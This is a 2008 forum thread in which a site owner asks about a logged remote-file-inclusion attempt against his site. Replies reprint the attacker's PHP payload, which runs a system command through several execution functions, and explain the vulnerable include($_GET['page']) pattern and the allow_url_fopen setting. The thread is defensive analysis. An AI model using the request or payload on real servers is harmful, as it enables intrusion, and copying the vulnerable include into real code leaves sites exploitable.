Weird page requests.

**dansgalaxy** · 02-13-2008, 04:37 PM

Hello,

i have a 404 page which emails me when theirs errors.

i know some are hack attempts but never seen this one before.

Code:

uk.calmcharity.org/*.php?page=http://opsz.3x.ro/safeon.txt??

just wonderd if any one seen it before ot can tell me what the "person" was trying to do?

**ForrestCroce** · 02-13-2008, 10:31 PM

I would have guessed referral spam, except that after looking at the file on 3x.ro, it's trying to read from the disc using php:

<?php
echo "jimmywho";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

**tripy** · 02-14-2008, 04:13 AM

It's a typicall php injection attempt.

It tries to inject the PHP code into a badly crafted script which would do a require() on a url without stupid-proofing (filtering) it.

**dansgalaxy** · 02-14-2008, 05:30 AM

Is there any way that that would be possible?

This sounds so nieve but its only now i realise how much even simple sites get hack attempts.

**tripy** · 02-14-2008, 06:51 AM

Of course it's possible. But the PHP must have the fopen url_wrappers enabled for that to work. Some PHP scripts are that badly done that they just do in include of a file passed in parameter.

If you have taken care of it, then you don't need to worry.

**dansgalaxy** · 02-14-2008, 07:07 AM

So what would i need (or not need) to have on a page/script whcih would make that hack work/

**tripy** · 02-14-2008, 07:54 AM

PHP Code:


			
include($_GET['page']);

**dansgalaxy** · 02-14-2008, 12:19 PM

Well i most definatly aint that thick...

**tripy** · 02-14-2008, 03:03 PM

I undoubtedly knew so!

**ForrestCroce** · 02-15-2008, 01:08 AM

Quote:

Originally Posted by tripy

It's a typicall php injection attempt.

Really...? This is the first I've heard of this. I only do very light php, so I really wouldn't be aware of it... Honestly, most of the work I do is sql backend stuff lately. My current situation is working only with data other internal processes have gathered and cleanses, so that's entirely impossible. But in asp.net a developer would have to work hard to make this type of injection possible ... and I've never tried, but I don't think you can include a code file that's not part of your domain in asp 3.0.

**tripy** · 02-15-2008, 03:11 AM

Quote:

But in asp.net a developer would have to work hard to make this type of injection possible

As I'm starting c# .net, I see now why.
It's that the .net engine makes everything needed to prevent it automatically.
Beside, I haven't seen (until now) an equivalent of PHP's include() statement, which extends a script with a file located elsewhere.

PHP have no such security, it's totally raw.
If you want to prevent it, then you must take it in view at the designing stage.

**dansgalaxy** · 02-15-2008, 08:22 AM

I know it probs wont work without maniulating the ini to allow it all.

So really only really unsecure servers this might work on...

**tripy** · 02-15-2008, 08:38 AM

Yep, the allow_url_fopen php.ini directive.
It's not a surprise it's deactivated by default. But I bet that there are so many scripts out there that may rely on it, that some hosts are bound to let it open to avoid tickets, and leave the security at the sole expense of there customers.

http://www.php.net/manual/en/ref.fil...llow-url-fopen